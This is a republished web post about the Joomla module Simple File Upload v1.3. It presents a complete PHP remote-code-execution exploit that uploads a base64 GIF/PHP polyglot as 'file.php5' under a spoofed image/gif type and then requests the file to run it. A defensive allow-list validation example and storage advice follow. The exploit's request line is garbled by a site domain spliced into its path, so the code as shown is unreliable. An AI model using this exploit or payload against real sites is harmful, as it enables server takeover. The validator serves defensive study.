
Joomla module Simple File Upload v1.3: remote code execution flaw and fix

Source: 自学PHP网    Date: 2015-04-17 13:03


 

<?PHP

/*
    --------------------------------------------------------------------------------
    Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit
    --------------------------------------------------------------------------------
    Author: gmda  gmda[at]email[dot]it
    Website: http://www.gmda.altervista.org/
    Software download: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip
    Affected version: 1.3
    Tested on: winxp php version 5.3.2  Apache 2.0

    *the module is set up with no captcha; all other settings are the defaults*

    +-------------------------------------------------------------------------+
    | For technical exchange only; use at your own risk                       |
    +-------------------------------------------------------------------------+

    The vulnerability lies in sending a malformed request to the server, which still accepts it and saves the file.
    This can be abused to send commands that the server then runs, clearly causing security problems.
    The script has problems with its upload validation.
*/

$host="127.0.0.1";
$port=80;
$shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg==";
$ContentType="image/gif";
$post="POST http://www.2cto.com /Joomla_1.5.23_ita-Stable_test_expl/index.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$filename="file.php5";

if(!$fp) die($errstr.$errno); else {

    $data="-----------------------------41184676334\r\n";
    $data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n";
    $data.="\r\n";
    $data.="100000\r\n-----------------------------41184676334\r\n";
    $data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n";
    $data.="\r\n\r\n";
    $data.="-----------------------------41184676334\r\n";
    $data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n";
    $data.=base64_decode($shell)."\r\n";
    $data.="-----------------------------41184676334--\r\n";

    $packet="$post HTTP/1.1\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;

    fwrite($fp, $packet);
    fclose($fp);

    $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r");
    if ($h) {
        while (($buf = fgets($h, 4096)) !== false) {
            echo $buf;
            echo("exploit was successful");
        }
        fclose($h);
    }else{
        echo("Error: exploit fail");
    }

?>
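
The request above succeeds because a file named `file.php5` is accepted on the strength of a client-supplied `Content-Type: image/gif` and a GIF-looking first few bytes. The following is an added example of the server-side check that refuses it; it is not the module's code and not part of the original post, and `sfu_safe_name` and `SFU_ALLOWED` are hypothetical names chosen for illustration.

```php
<?php
// Added example: allow-list validation for one uploaded file.
// sfu_safe_name() and SFU_ALLOWED are hypothetical names, not part of the module.

const SFU_ALLOWED = [            // extension => MIME type detected from the content
    'gif' => 'image/gif',
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
];

/**
 * Validate an upload and return a server-generated name to store it under.
 * Throws RuntimeException when the upload must be rejected.
 */
function sfu_safe_name(string $clientName, string $tmpPath): string
{
    // 1. Exactly one suffix and no odd characters: refuses "x.php.gif" and
    //    names containing NUL bytes, slashes or spaces.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $clientName, $m)) {
        throw new RuntimeException('rejected: file name');
    }
    // 2. Extension allow-list (a deny-list of "php" alone would miss "php5").
    $ext = strtolower($m[1]);
    if (!isset(SFU_ALLOWED[$ext])) {
        throw new RuntimeException("rejected: extension .$ext");
    }
    // 3. Ignore the Content-Type sent by the client; sniff the bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== SFU_ALLOWED[$ext]) {
        throw new RuntimeException("rejected: content is $mime");
    }
    // 4. The file must also decode as an image.
    if (@getimagesize($tmpPath) === false) {
        throw new RuntimeException('rejected: not a decodable image');
    }
    // 5. Never reuse the client's name on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed demo input: GIF-like leading bytes, inert body, script-style name.
$tmp = tempnam(sys_get_temp_dir(), 'sfu');
file_put_contents($tmp, "GIF8/*placeholder*/");
try {
    sfu_safe_name('file.php5', $tmp);
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL;   // refused at the extension check
}
unlink($tmp);
```

Store accepted files outside the web root, or in a directory where the web server is configured not to execute scripts, so that a polyglot file that passes the content checks is still never run.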
